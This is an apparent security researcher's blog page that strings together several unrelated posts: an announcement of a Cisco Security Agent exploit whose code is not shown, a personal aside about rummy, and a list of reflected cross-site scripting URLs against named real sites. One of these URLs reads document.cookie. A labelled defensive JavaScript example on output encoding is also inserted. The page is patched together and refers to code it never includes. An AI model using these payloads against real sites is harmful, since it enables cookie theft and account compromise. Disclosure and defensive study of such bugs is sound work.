Here is my proof-of-concept exploit for the Cisco Security Agent Management st_upload Remote Code Execution Vulnerability (ZDI-11-088), which I reported to ZDI a little while back.
CVE ID: CVE-2011-0364
My wife and I are playing a “never ending” game of rummy and, being the geek I am, I decided to keep track of our game play so we can chart our progress. Needless to say, my wife is kicking my ass and now it’s public for all to see. Luckily, I have time for an amazing comeback that will also be completely documented.
I have a bad habit of saving these little random bugs and telling myself that I ‘may have a need for them later’. I think that’s just the paranoid security guy in me, but then again I do the same for random little electronic parts I find. Given that I just cleaned out all my old parts, I figured I needed to do the same for these, so here are some random XSS bugs I’ve found. As of now (Tue Jan 4 21:07:03 EST 2011) all are unpatched except for the mint.com one (on a side note, their group of guys seems great!).
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//
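As an added, defender-side example that is not part of the original post: the URLs above reflect a query parameter into two different output contexts, a double-quoted HTML attribute (the `">` break-out) and a JavaScript string literal (the `');` break-out). The JavaScript below shows context-aware output encoding that keeps such parameters inert in each context. The function names are assumptions for illustration, and the sample inputs are constructed to mirror the break-out shapes seen in the list.

```javascript
// Added example, not code from the original post. Demonstrates context-aware
// output encoding for the two reflected-XSS contexts seen in the URL list:
// an HTML attribute value and a JavaScript string literal.

// Escape for an HTML text node or a double-quoted attribute value.
// Every character that can terminate the attribute or open a tag is encoded.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Escape for use inside a JavaScript string literal: everything outside
// [A-Za-z0-9] becomes a \uXXXX escape, so quotes, parentheses and
// semicolons can never close the literal or start a new statement.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    return '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

// Render an anchor whose href comes from an untrusted return_url parameter
// (the attribute context of the yelp/armorize-style URLs above).
function renderReturnLink(returnUrl) {
  return '<a href="' + escapeHtml(returnUrl) + '">Return</a>';
}

// Render an inline script that echoes an untrusted search term into a JS
// string (the script-string context of the webroot/mcafee-style URLs above).
function renderSearchScript(query) {
  return "<script>var q = '" + escapeJsString(query) + "';</script>";
}

// Constructed sample inputs (hypothetical) shaped like the break-outs above.
const attrPayload = '"><script>alert(1)</script>';
const jsPayload = "');alert('gerry";

// Returns both rendered fragments so the result can be inspected or asserted on.
function demo() {
  return {
    link: renderReturnLink(attrPayload),
    script: renderSearchScript(jsPayload),
  };
}

console.log(demo());
```

The important point is that the encoder is chosen by the output context, not by the input: the same `escapeHtml` that is correct for an attribute value would not be sufficient inside a script string, which is why the search-term case uses `escapeJsString` instead.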
I’ve been cleaning old code again and I think it’s been long enough that I can release this now. I used it to extract code that was embedded within the Cisco Security Agent Management Console (CSAMC). Hopefully someone will find it useful.
Not sure when this got reported or fixed, but I guess I missed the reward by a day.
https://adwords.google.com/cm/CampaignMgmt?__u=1111111111&__c=1111111111&stylePrefOverride=2',0);alert(document.cookie)//
